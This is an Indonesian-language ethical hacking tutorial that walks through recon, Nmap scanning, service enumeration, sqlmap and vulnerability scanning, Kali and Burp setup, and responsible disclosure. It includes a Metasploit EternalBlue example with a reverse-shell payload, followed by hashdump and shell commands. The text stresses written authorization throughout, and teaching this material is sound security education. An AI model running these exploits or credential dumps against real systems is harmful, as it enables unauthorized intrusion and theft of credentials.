1. Apa Itu Ethical Hacking?
Ethical hacking (hacking etis) adalah praktik melakukan penetrasi terhadap sistem komputer, jaringan, atau aplikasi atas izin pemiliknya dengan tujuan menemukan dan memperbaiki kerentanan keamanan sebelum dimanfaatkan oleh pihak yang tidak bertanggung jawab. Berbeda dengan hacker jahat (black hat), ethical hacker bekerja secara legal, terdokumentasi, dan bertanggung jawab untuk meningkatkan keamanan suatu organisasi.
Istilah "ethical hacker" pertama kali dipopulerkan oleh Dr. Rajesh Pant dan kemudian dilembagakan melalui sertifikasi Certified Ethical Hacker (CEH) oleh EC-Council. Seorang ethical hacker harus memiliki pemahaman mendalam tentang cara kerja serangan siber, namun menggunakan pengetahuan tersebut untuk tujuan defensif — melindungi infrastruktur digital dari ancaman nyata.
Kategori Hacker Berdasarkan Motivasi
| Kategori | Deskripsi | Motivasi | Legalitas |
|---|---|---|---|
| White Hat | Hacker yang bekerja secara legal dengan izin resmi dari pemilik sistem. Melakukan penetration testing, security audit, dan vulnerability assessment. | Meningkatkan keamanan, melindungi data | ✅ Legal |
| Black Hat | Hacker yang mengeksploitasi kerentanan untuk keuntungan pribadi, pencurian data, atau merusak sistem tanpa izin. | Finansial, kehancuran, ideologi | ❌ Ilegal |
| Grey Hat | Hacker yang menemukan kerentanan tanpa izin namun tidak mengeksploitasi untuk kejahatan. Biasanya melaporkan temuan ke pemilik sistem. | Pengakuan, challenge teknis | ⚠️ Abu-abu |
| Script Kiddie | Istilah untuk individu yang menggunakan tools yang sudah ada tanpa pemahaman mendalam tentang cara kerjanya. | Ego, iseng, ikut-ikutan | ❌ Biasanya ilegal |
| Red Team | Tim ethical hacker yang disewa organisasi untuk mensimulasikan serangan nyata dan menguji pertahanan (blue team) secara menyeluruh. | Uji pertahanan organisasi | ✅ Legal (dikontrak) |
Meskipun sering digunakan bergantian, ethical hacker memiliki cakupan lebih luas — mencakup social engineering, physical security testing, dan security consulting. Penetration tester lebih spesifik terfokus pada identifikasi dan eksploitasi kerentanan teknis pada sistem, jaringan, atau aplikasi.
2. Kerangka Hukum & Etika
Sebelum terjun ke dunia ethical hacking, sangat penting untuk memahami kerangka hukum yang mengatur aktivitas ini. Tanpa pemahaman hukum yang memadai, seorang ethical hacker bisa saja secara tidak sengaja melanggar hukum meskipun niatnya baik. Di Indonesia, beberapa undang-undang yang relevan antara lain:
Regulasi di Indonesia
| Regulasi | Pasal Relevan | Deskripsi |
|---|---|---|
| UU ITE No. 11/2008 | Pasal 30-35 | Mengatur tindak pidana di bidang teknologi informasi termasuk akses ilegal, penyadapan, dan manipulasi data. Ancaman pidana hingga 8 tahun penjara dan denda hingga 800 juta rupiah. |
| PP No. 71/2019 | Pasal 13-15 | Penyelenggaraan Sistem dan Transaksi Elektronik (PSTE) — mengatur kewajiban keamanan informasi bagi penyelenggara sistem elektronik. |
| Permenkominfo No. 4/2016 | Seluruh pasal | Sistem Manajemen Keamanan Informasi (SMKI) — mewajibkan penerapan standar ISO 27001 bagi penyelenggara sistem elektronik strategis. |
| UU PDP No. 27/2022 | Pasal 67-72 | Perlindungan Data Pribadi — mengatur hak subjek data dan sanksi bagi pelanggaran data pribadi termasuk akibat security breach. |
Tidak pernah melakukan penetration testing tanpa surat izin tertulis (written authorization) dari pemilik sistem. Dokumen ini biasanya disebut Rules of Engagement (RoE) atau Scope of Work (SOW) dan harus mencakup cakupan pengujian, metode yang diizinkan, batas waktu, kontak darurat, dan pernyataan bahwa kamu diizinkan untuk melakukan aktivitas pengujian keamanan.
Kode Etik Ethical Hacker
Selain hukum formal, ethical hacker juga harus mematuhi kode etik profesional berikut:
1. SELALU dapatkan izin tertulis sebelum melakukan pengujian.
2. TIDAK PERNAH mengeksploitasi kerentanan di luar cakupan yang disepakati.
3. JANGAN menyimpan, mendistribusikan, atau menggunakan data sensitif yang ditemukan
selama pengujian.
4. LAPORKAN SEMUA kerentanan yang ditemukan, termasuk yang tampaknya minor.
5. GUNAKAN temuan untuk memperbaiki keamanan, bukan untuk keuntungan pribadi.
6. HORMATI privasi dan kerahasiaan informasi klien.
7. JANGAN melakukan serangan yang dapat menyebabkan kerusakan layanan (DoS)
kecuali secara eksplisit disetujui dalam RoE.
8. DOKUMENTASIKAN semua langkah pengujian untuk keperluan audit dan pelaporan.
9. TINGKATKAN kompetensi secara berkelanjutan mengikuti perkembangan ancaman terbaru.
10. JAGA integritas profesi dan tidak mencemarkan nama baik ethical hacker.
3. Metodologi: Phase 1 — Reconnaissance
Reconnaissance (pengintaian) adalah tahap pertama dan paling kritis dalam siklus ethical hacking. Tahap ini bertujuan mengumpulkan sebanyak mungkin informasi tentang target tanpa berinteraksi langsung dengan sistem target. Semakin banyak informasi yang dikumpulkan, semakin besar kemungkinan menemukan celah keamanan di tahap selanjutnya.
Passive Reconnaissance
Passive reconnaissance dilakukan tanpa mengirimkan lalu lintas langsung ke target. Informasi dikumpulkan dari sumber publik yang tersedia secara bebas di internet:
# ============================================
# Passive Reconnaissance — OSINT Gathering
# ============================================
# 1. WHOIS Lookup — informasi registrasi domain
whois example.com
# 2. DNS Record Enumeration
dig example.com ANY
dig example.com A
dig example.com MX
dig example.com NS
dig example.com TXT # SPF, DKIM, DMARC records
# 3. Subdomain discovery menggunakan crt.sh (Certificate Transparency)
curl -s "https://crt.sh/?q=%25.example.com&output=json" | \
jq -r '.[].name_value' | sort -u
# 4. Google Dorking — mencari informasi sensitif di Google
# site:example.com filetype:pdf
# site:example.com inurl:admin
# site:example.com intitle:"index of"
# site:example.com ext:sql | ext:bak | ext:log
# 5. Wayback Machine — melihat arsip website
# https://web.archive.org/web/*/example.com
# 6. Shodan — search engine untuk perangkat IoT
# https://www.shodan.io/search?query=org:"Example Corp"
# 7. theHarvester — mengumpulkan email dan subdomain
theHarvester -d example.com -b google,bing,linkedin -l 200
# 8. Recon-ng — framework OSINT modular
recon-ng
> workspaces create example_recon
> modules load recon/domains-hosts/hackertarget
> set SOURCE example.com
> run
Active Reconnaissance
Active reconnaissance melibatkan interaksi langsung dengan target, seperti mengirimkan paket jaringan atau request HTTP. Aktivitas ini lebih berisiko terdeteksi oleh sistem pertahanan target (IDS/IPS), namun memberikan informasi yang lebih detail.
# ============================================
# Active Reconnaissance — Direct Interaction
# ============================================
# 1. DNS Zone Transfer Attempt (jika dikonfigurasi salah)
dig axfr @ns1.example.com example.com
# 2. Subdomain Brute Force
dnsenum example.com --enum -f /usr/share/wordlists/subdomains.txt
# 3. WAF Detection menggunakan wafw00f
wafw00f https://example.com
# 4. Technology Stack Detection menggunakan WhatWeb
whatweb https://example.com -v
# 5. Directory Bruteforce menggunakan gobuster
gobuster dir -u https://example.com \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-t 50 -x php,html,txt,bak
# 6. Email Harvester dari berbagai sumber
amass enum -passive -d example.com -o amass_output.txt
Mulai SELALU dari passive reconnaissance. Gunakan OSINT Framework
(osintframework.com) sebagai referensi lengkap tools pengumpulan
informasi. Catat SEMUA temuan — bahkan informasi yang tampaknya tidak relevan
bisa menjadi kunci di tahap selanjutnya. Simpan hasil dalam format terstruktur
menggunakan tools seperti CherryTree atau Obsidian.
4. Metodologi: Phase 2 — Scanning
Setelah mengumpulkan informasi dasar dari fase reconnaissance, tahap scanning dilakukan untuk mengidentifikasi port terbuka, layanan yang berjalan, sistem operasi target, dan potensi kerentanan yang bisa dieksploitasi. Tahap ini menggunakan tools otomatis untuk melakukan pemetaan infrastruktur target secara mendalam.
Network Scanning dengan Nmap
Nmap (Network Mapper) adalah tool scanning paling populer dan powerful di dunia ethical hacking. Berikut berbagai teknik scanning yang harus dikuasai:
# ============================================
# Nmap Scanning — Berbagai Teknik
# ============================================
# 1. Ping Scan — menemukan host aktif di jaringan
nmap -sn 192.168.1.0/24
# 2. TCP SYN Scan (stealth scan) — scan port tanpa menyelesaikan handshake
sudo nmap -sS -T4 -p- 192.168.1.100
# 3. Service Version Detection — mengidentifikasi versi layanan
nmap -sV -sC -p 22,80,443,3306,8080 192.168.1.100
# 4. OS Fingerprinting — mendeteksi sistem operasi target
sudo nmap -O --osscan-guess 192.168.1.100
# 5. Aggressive Scan — gabungan semua deteksi
sudo nmap -A -T4 192.168.1.100
# 6. UDP Scan — scan port UDP (sering terlewat)
sudo nmap -sU --top-ports 100 192.168.1.100
# 7. Script Scan — menggunakan NSE scripts untuk vuln detection
sudo nmap --script vuln 192.168.1.100
# 8. Output ke berbagai format
nmap -sV -oN scan_normal.txt 192.168.1.100 # Normal text
nmap -sV -oX scan_xml.xml 192.168.1.100 # XML format
nmap -sV -oG scan_grep.txt 192.168.1.100 # Grepable format
nmap -sV -oA scan_all 192.168.1.100 # Semua format
Vulnerability Scanning dengan NSE Scripts
# ============================================
# Nmap NSE Scripts — Vulnerability Detection
# ============================================
# Scan kerentanan spesifik
sudo nmap --script http-enum 192.168.1.100 # Enumerasi direktori web
sudo nmap --script ssl-heartbleed -p 443 192.168.1.100 # Heartbleed CVE-2014-0160
sudo nmap --script smb-vuln* -p 445 192.168.1.100 # SMB vulnerabilities
sudo nmap --script ftp-anon -p 21 192.168.1.100 # Anonymous FTP
# Kategori NSE scripts
ls /usr/share/nmap/scripts/ | grep vuln # Semua script vulnerability
ls /usr/share/nmap/scripts/ | grep exploit # Semua script exploit
ls /usr/share/nmap/scripts/ | grep brute # Semua script brute force
5. Metodologi: Phase 3 — Enumeration
Enumeration adalah tahap di mana ethical hacker melakukan pengumpulan informasi yang lebih mendalam dan terfokus pada layanan yang ditemukan di fase scanning. Tujuannya adalah mengidentifikasi user accounts, shared resources, network resources, dan konfigurasi layanan yang rentan.
Teknik Enumeration Berdasarkan Protokol
# ============================================
# Enumeration — Berbagai Protokol
# ============================================
# 1. SMB Enumeration (Windows File Sharing)
smbclient -L //192.168.1.100 -N # List shares tanpa password
enum4linux -a 192.168.1.100 # Full SMB enumeration
crackmapexec smb 192.168.1.100 --shares # CME share enumeration
# 2. SNMP Enumeration
snmpwalk -v2c -c public 192.168.1.100 # Walk SNMP tree
snmpwalk -v2c -c public 192.168.1.100 1.3.6.1.4.1.77.1.2.25 # User accounts
onesixtyone -c community_strings.txt 192.168.1.100 # Community string brute
# 3. LDAP Enumeration
ldapsearch -h 192.168.1.100 -x -b "dc=example,dc=com" # Anonymous LDAP
# 4. NFS Enumeration
showmount -e 192.168.1.100 # List NFS exports
# 5. SMTP Enumeration (user enumeration via VRFY)
smtp-user-enum -M VRFY -U /usr/share/wordlists/users.txt -t 192.168.1.100
# 6. Web Enumeration
nikto -h https://192.168.1.100 # Web server vulnerability scanner
dirb https://192.168.1.100 /usr/share/wordlists/dirb/common.txt # Directory brute
Enumeration menghasilkan banyak lalu lintas jaringan yang mencurigakan. Sistem IDS/IPS seperti Snort atau Suricata akan mendeteksi aktivitas ini. Pastikan kamu memiliki izin tertulis yang mencakup teknik-teknik yang digunakan. Gunakan rate limiting dan timing delays untuk menghindari trigger alarm berlebihan selama pengujian yang sah.
6. Vulnerability Assessment
Vulnerability assessment adalah proses identifikasi, klasifikasi, dan prioritisasi kerentanan yang ditemukan pada sistem target. Berbeda dengan penetration testing yang mencoba mengeksploitasi kerentanan, vulnerability assessment berfokus pada pencarian dan pelaporan kerentanan secara komprehensif.
CVSS: Common Vulnerability Scoring System
Setiap kerentanan yang ditemukan dinilai menggunakan sistem penilaian CVSS (Common Vulnerability Scoring System) yang dikembangkan oleh FIRST.org. Skor CVSS berkisar dari 0.0 (tidak berbahaya) hingga 10.0 (sangat kritis):
| Skor CVSS | Severity | Warna | Contoh |
|---|---|---|---|
| 9.0 – 10.0 | Critical | 🔴 | Remote Code Execution (RCE) tanpa autentikasi, SQL Injection pada form login |
| 7.0 – 8.9 | High | 🟠 | Privilege escalation, authenticated RCE, path traversal |
| 4.0 – 6.9 | Medium | 🟡 | Cross-Site Scripting (XSS), information disclosure, weak cryptography |
| 0.1 – 3.9 | Low | 🟢 | Missing security headers, verbose error messages, clickjacking |
| 0.0 | Informational | 🔵 | Software version disclosure, open ports tanpa kerentanan, default configurations |
Tools Vulnerability Assessment
# ============================================
# Vulnerability Assessment — Tools Utama
# ============================================
# 1. OpenVAS / Greenbone Vulnerability Manager
# Full-featured vulnerability scanner
sudo gvm-start # Start OpenVAS
# Buka https://127.0.0.1:9392 di browser
# Buat target baru, jalankan Full and Fast scan
# 2. Nikto — Web Server Scanner
nikto -h https://target.example.com -o nikto_report.html -Format htm
# 3. SQLMap — Automated SQL Injection Detection
sqlmap -u "https://example.com/page?id=1" --batch --risk=3 --level=5
sqlmap -u "https://example.com/page?id=1" --dbs # Enum databases
sqlmap -u "https://example.com/page?id=1" -D dbname --tables # Enum tables
# 4. WPScan — WordPress Vulnerability Scanner
wpscan --url https://example.com --enumerate vp,vt,u
# 5. SearchSploit — Offline Exploit-DB Search
searchsploit apache 2.4.49 # Cari exploit untuk versi spesifik
searchsploit -m 50383 # Copy exploit ke direktori kerja
# 6. Nuclei — Template-based Vulnerability Scanner
nuclei -u https://target.example.com -t cves/
nuclei -u https://target.example.com -t vulnerabilities/ -severity critical,high
Gunakan Dradis Framework atau Faraday untuk mengelola dan mengkonsolidasi hasil dari berbagai tools. Dokumentasikan setiap temuan dengan format standar: Nama Kerentanan → Deskripsi → Dampak → Bukti (Screenshot/PoC) → Rekomendasi Remediasi. Ini akan menjadi fondasi laporan akhir penetration test.
7. Pengantar Kali Linux
Kali Linux adalah distribusi Linux yang dirancang khusus untuk keperluan penetration testing, security research, dan digital forensics. Dikembangkan oleh Offensive Security, Kali Linux merupakan distro paling populer di kalangan professional keamanan siber dan menjadi standar industri untuk ethical hacking.
Instalasi & Setup Kali Linux
# ============================================
# Kali Linux — Setup & Konfigurasi Dasar
# ============================================
# 1. Download Kali Linux dari https://www.kali.org/get-kali/
# - Installer ISO (bare metal / dual boot)
# - Virtual Machine (VMware / VirtualBox)
# - WSL (Windows Subsystem for Linux)
# - ARM images (Raspberry Pi)
# 2. Update & Upgrade setelah instalasi
sudo apt update && sudo apt upgrade -y
# 3. Install Kali Linux via WSL (Windows 10/11)
wsl --install -d kali-linux
# Atau dari Microsoft Store
# 4. Konfigurasi dasar
sudo apt install -y kali-linux-default # Install semua tools default
sudo apt install -y kali-linux-large # Install toolset lengkap
# 5. Mengelola layanan
sudo systemctl start postgresql # Untuk Metasploit database
sudo msfdb init # Inisialisasi Metasploit database
# 6. Update tools yang tidak termanage apt
sudo apt install -y exploitdb # Update Exploit-DB / searchsploit
sudo nmap --script-updatedb # Update NSE scripts
sudo apt install -y wordlists # Install wordlists (rockyou, dll)
Arsitektur Kali Linux & Kategori Tools
| Kategori | Deskripsi | Contoh Tools |
|---|---|---|
| Information Gathering | Pengumpulan informasi dan OSINT | Nmap, Maltego, Recon-ng, theHarvester, Shodan CLI |
| Vulnerability Analysis | Identifikasi kerentanan sistem | OpenVAS, Nikto, SQLmap, WPScan, Nuclei |
| Web Application | Pengujian keamanan aplikasi web | Burp Suite, OWASP ZAP, Nikto, Dirb, Gobuster |
| Exploitation | Eksploitasi kerentanan yang ditemukan | Metasploit Framework, SearchSploit, BeEF |
| Wireless Attacks | Pengujian keamanan jaringan nirkabel | Aircrack-ng, Wifite, Kismet, Reaver |
| Forensics | Analisis forensik digital | Autopsy, Volatility, Binwalk, Foremost |
| Sniffing & Spoofing | Penyadapan dan pemalsuan jaringan | Wireshark, tcpdump, Ettercap, Bettercap |
| Post Exploitation | Aktivitas setelah berhasil masuk | PowerShell Empire, Mimikatz, BloodHound |
8. Tools Dasar Ethical Hacking
Berikut adalah tools-tools fundamental yang harus dikuasai oleh setiap ethical hacker pemula. Tools ini merupakan standar industri dan digunakan secara luas oleh security professional di seluruh dunia.
Nmap — Network Mapper
Nmap adalah tool wajib yang digunakan untuk discovery host, port scanning, dan service detection. Dikembangkan oleh Gordon Lyon (Fyodor), Nmap telah menjadi standar de facto untuk network reconnaissance sejak tahun 1997.
Burp Suite — Web Application Testing
Burp Suite adalah platform terintegrasi untuk pengujian keamanan aplikasi web. Versi Community Edition tersedia gratis dan sudah sangat powerful untuk belajar. Burp Suite menawarkan proxy intercepting, spider, scanner, repeater, dan intruder.
# ============================================
# Burp Suite — Setup Proxy di Browser
# ============================================
# 1. Jalankan Burp Suite
burpsuite &
# 2. Di browser Firefox, atur proxy manual:
# Preferences → Network Settings → Manual Proxy
# HTTP Proxy: 127.0.0.1 Port: 8080
# Centang "Also use this proxy for HTTPS"
# 3. Install Burp CA Certificate:
# Buka http://burpsuite di browser → Download CA Certificate
# Import ke Firefox: Preferences → Certificates → Import
# 4. Intercept request:
# Buka tab Proxy → Intercept → Toggle "Intercept is on"
# Browse ke target — request akan tertangkap di Burp
# Modifikasi request → Forward atau Drop
Wireshark — Network Protocol Analyzer
Wireshark adalah tool analisis paket jaringan yang memungkinkan ethical hacker untuk menangkap dan menganalisis lalu lintas jaringan secara real-time. Sangat berguna untuk memahami komunikasi protokol dan mendeteksi anomali.
Metasploit Framework — Exploitation Platform
# ============================================
# Metasploit Framework — Contoh Penggunaan
# ============================================
# 1. Mulai Metasploit
sudo msfconsole
# 2. Contoh: Scan dan eksploitasi SMB vulnerability (MS17-010 / EternalBlue)
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 > set RHOSTS 192.168.1.100
msf6 > run
# Jika rentan, gunakan exploit:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > run
# 3. Perintah Meterpreter (setelah berhasil masuk)
meterpreter > sysinfo # Info sistem target
meterpreter > getuid # User saat ini
meterpreter > hashdump # Dump password hashes
meterpreter > shell # Drop ke system shell
meterpreter > screenshot # Ambil screenshot
# 4. Cari exploit berdasarkan CVE
msf6 > search cve:CVE-2021-44228 # Log4Shell
Metasploit Framework adalah tool yang sangat powerful yang mampu mengeksploitasi kerentanan nyata. HANYA gunakan pada target yang memiliki izin pengujian tertulis. Menggunakan Metasploit terhadap sistem tanpa izin adalah tindak pidana berdasarkan UU ITE dan dapat mengakibatkan hukuman penjara.
9. Responsible Disclosure
Responsible disclosure adalah praktik etis di mana seorang peneliti keamanan yang menemukan kerentanan melaporkannya secara rahasia kepada vendor atau pemilik sistem terlebih dahulu, memberikan waktu yang wajar bagi mereka untuk memperbaiki kerentanan sebelum diungkapkan ke publik. Ini adalah tanggung jawab moral setiap ethical hacker.
Proses Responsible Disclosure
Program Bug Bounty
Banyak perusahaan besar menyelenggarakan program bug bounty yang memberikan penghargaan finansial bagi peneliti yang menemukan dan melaporkan kerentanan secara bertanggung jawab. Platform populer untuk bug bounty antara lain:
| Platform | URL | Deskripsi |
|---|---|---|
| HackerOne | hackerone.com | Platform bug bounty terbesar di dunia, digunakan oleh Google, Microsoft, GitHub, dan ratusan perusahaan lainnya. |
| Bugcrowd | bugcrowd.com | Platform managed bug bounty dan vulnerability disclosure yang banyak digunakan enterprise. |
| Intigriti | intigriti.com | Platform Eropa yang fokus pada quality over quantity, populer di komunitas EMEA. |
| Synack | synack.com | Platform invite-only yang menggabungkan AI dan red team untuk pengujian keamanan berkelanjutan. |
Subject: Responsible Disclosure — Vulnerability Report for [Nama Perusahaan]
Kepada Tim Keamanan [Nama Perusahaan],
Saya menemukan kerentanan keamanan pada layanan [nama layanan/produk] yang
dapat berdampak pada keamanan data pengguna. Detail temuan:
1. JENIS KERENTANAN: [Contoh: SQL Injection / XSS / RCE]
2. LOKASI: [URL/endpoint yang terdampak]
3. DAMPAK: [Jelaskan potensi dampak — data leakage, RCE, dll]
4. LANGKAH REPRODUKSI:
- Langkah 1: ...
- Langkah 2: ...
- Langkah 3: ...
5. BUKTI: [Screenshot / PoC — JANGAN eksploitasi secara berlebihan]
6. REKOMENDASI: [Saran perbaikan]
Temuan ini saya laporkan secara bertanggung jawab dan saya tidak akan
mengungkapkannya ke publik hingga perbaikan tersedia. Saya bersedia
berkolaborasi untuk validasi dan remediasi.
Atas perhatiannya, saya ucapkan terima kasih.
[Nama]
[Email]
[Kontak]
Jangan pernah mengeksploitasi kerentanan secara berlebihan — cukup buktikan bahwa kerentanan ada tanpa mengakses atau memodifikasi data sensitif. Jangan mengancam vendor atau meminta imbalan yang tidak wajar. Berikan waktu yang cukup bagi vendor untuk memperbaiki (standar: 90 hari sejak laporan pertama). Jika vendor tidak merespons, eskalasi melalui CERT nasional.
10. Ringkasan & Langkah Selanjutnya
Ethical hacking adalah bidang yang terus berkembang seiring makin kompleksnya ancaman siber. Memahami dasar-dasar metodologi — dari reconnaissance hingga responsible disclosure — adalah fondasi untuk menjadi seorang professional keamanan siber yang kompeten dan bertanggung jawab.
| Fase | Tujuan | Tools Utama |
|---|---|---|
| 1. Reconnaissance | Mengumpulkan informasi target dari sumber publik | WHOIS, Dig, theHarvester, Recon-ng, Shodan |
| 2. Scanning | Mengidentifikasi port, layanan, dan OS target | Nmap, Masscan, Unicornscan |
| 3. Enumeration | Mengumpulkan detail mendalam dari layanan aktif | enum4linux, gobuster, nikto, ldapsearch |
| 4. Vulnerability Assessment | Mengidentifikasi dan menilai kerentanan | OpenVAS, Nuclei, SQLmap, WPScan |
| 5. Exploitation | Membuktikan kerentanan dapat dimanfaatkan | Metasploit, Burp Suite, manual exploits |
| 6. Post-Exploitation | Mengevaluasi dampak akses yang berhasil | Mimikatz, BloodHound, PowerView |
| 7. Reporting | Mendokumentasikan temuan dan rekomendasi | Dradis, CherryTree, Markdown templates |
Untuk memvalidasi kompetensi, pertimbangkan sertifikasi berikut: CEH (Certified Ethical Hacker) oleh EC-Council untuk level dasar, CompTIA PenTest+ untuk penetration testing, OSCP (Offensive Security Certified Professional) oleh Offensive Security untuk level lanjutan yang sangat dihargai industri, dan Bug Bounty Hunter path di HackerOne untuk pengalaman praktis. OSCP secara khusus dianggap sebagai gold standard karena format ujian hands-on 24 jam yang menantang.
11. Quiz: Uji Pemahamanmu
Jawab pertanyaan berikut untuk menguji pemahaman kamu tentang ethical hacking dasar. Pilih satu jawaban terbaik untuk setiap pertanyaan.